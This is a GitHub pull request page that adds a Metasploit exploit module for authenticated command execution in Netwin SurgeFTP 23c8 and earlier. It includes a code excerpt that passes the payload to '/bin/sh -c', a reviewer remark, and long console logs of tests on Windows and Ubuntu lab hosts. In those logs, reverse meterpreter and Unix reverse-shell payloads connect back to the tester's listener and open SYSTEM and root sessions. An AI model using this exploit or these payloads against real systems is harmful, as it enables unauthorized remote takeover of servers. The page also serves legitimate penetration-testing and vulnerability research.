New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add Netwin surgeftp exec module #1198
Merged
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
|
||
when 'unix' | ||
print_status("#{rhost}:#{rport} - Sending payload...") | ||
http_send_command(%Q|/bin/sh -c "#{payload.encoded}"|) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This makes me think that "
should be a badchar for the unix target.
Tested over windows and linux successfully: msf exploit(netwin_surgeftp_exec) > show options Module options (exploit/multi/http/netwin_surgeftp_exec): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD password yes The password for the specified username Proxies no Use a proxy chain RHOST 192.168.1.147 yes The target address RPORT 7021 yes The target port USERNAME admin yes The username with admin role to authenticate as VHOST no HTTP server virtual host Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST 192.168.1.128 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows msf exploit(netwin_surgeftp_exec) > set password admin password => admin msf exploit(netwin_surgeftp_exec) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.128:4444 [*] 192.168.1.147:7021 - Sending VBS stager... [*] Command Stager progress - 0.47% done (499/105503 bytes) [*] Command Stager progress - 0.95% done (998/105503 bytes) [*] Command Stager progress - 1.42% done (1497/105503 bytes) [*] Command Stager progress - 1.89% done (1996/105503 bytes) ... [*] Command Stager progress - 98.75% done (104187/105503 bytes) [*] Command Stager progress - 99.20% done (104663/105503 bytes) [*] Command Stager progress - 99.66% done (105145/105503 bytes) [*] Sending stage (752128 bytes) to 192.168.1.147 [*] Command Stager progress - 100.00% done (105503/105503 bytes) [*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.147:2209) at 2012-12-22 15:39:47 +0100 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > exit msf exploit(netwin_surgeftp_exec) > set rhost 192.168.1.136 rhost => 192.168.1.136 msf exploit(netwin_surgeftp_exec) > set target 1 target => 1 msf exploit(netwin_surgeftp_exec) > show options Module options (exploit/multi/http/netwin_surgeftp_exec): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD admin yes The password for the specified username Proxies no Use a proxy chain RHOST 192.168.1.136 yes The target address RPORT 7021 yes The target port USERNAME admin yes The username with admin role to authenticate as VHOST no HTTP server virtual host Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST 192.168.1.128 yes The listen address LPORT 4444 yes The listen port s Exploit target: Id Name -- ---- 1 Unix msf exploit(netwin_surgeftp_exec) > set payload cmd/unix/ set payload cmd/unix/bind_netcat set payload cmd/unix/bind_perl_ipv6 set payload cmd/unix/generic set payload cmd/unix/reverse_netcat set payload cmd/unix/reverse_ruby set payload cmd/unix/bind_netcat_ipv6 set payload cmd/unix/bind_ruby set payload cmd/unix/reverse set payload cmd/unix/reverse_perl set payload cmd/unix/bind_perl set payload cmd/unix/bind_ruby_ipv6 set payload cmd/unix/reverse_bash set payload cmd/unix/reverse_python msf exploit(netwin_surgeftp_exec) > set payload cmd/unix/reverse payload => cmd/unix/reverse msf exploit(netwin_surgeftp_exec) > rexploit [*] Reloading module... [*] Started reverse double handler [*] 192.168.1.136:7021 - Sending payload... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo aRHNJagK8VBaTEWz; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "aRHNJagK8VBaTEWz\r\n" [*] Matching... [*] B is input... [*] Command shell session 2 opened (192.168.1.128:4444 -> 192.168.1.136:34756) at 2012-12-22 15:44:55 +0100 id uid=0(root) gid=0(root) groups=0(root) ^C Abort session 2? [y/N] y msf exploit(netwin_surgeftp_exec) > set payload cmd/unix/reverse_perl payload => cmd/unix/reverse_perl msf exploit(netwin_surgeftp_exec) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.128:4444 [*] 192.168.1.136:7021 - Sending payload... [*] Command shell session 3 opened (192.168.1.128:4444 -> 192.168.1.136:34761) at 2012-12-22 15:46:57 +0100 id uid=0(root) gid=0(root) groups=0(root) ^C Abort session 3? [y/N] y [*] 192.168.1.136 - Command shell session 3 closed. Reason: User exit merging! |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This is based on Exploit-DB's PoC:
http://www.exploit-db.com/exploits/23522/
EDB hosts the vulnerable Windows version. I also tested the Unix version from the official site, still vulnerable:
http://netwinsite.com/cgi-bin/keycgi.exe?cmd=download&product=surgeftp
This module exploits a vulnerability found in Netwin SurgeFTP, version 23c8 or prior. In order to execute commands via the FTP service, please note that you must have a valid credential to the web-based administrative console.
Demo on Windows:
Demo on Ubuntu: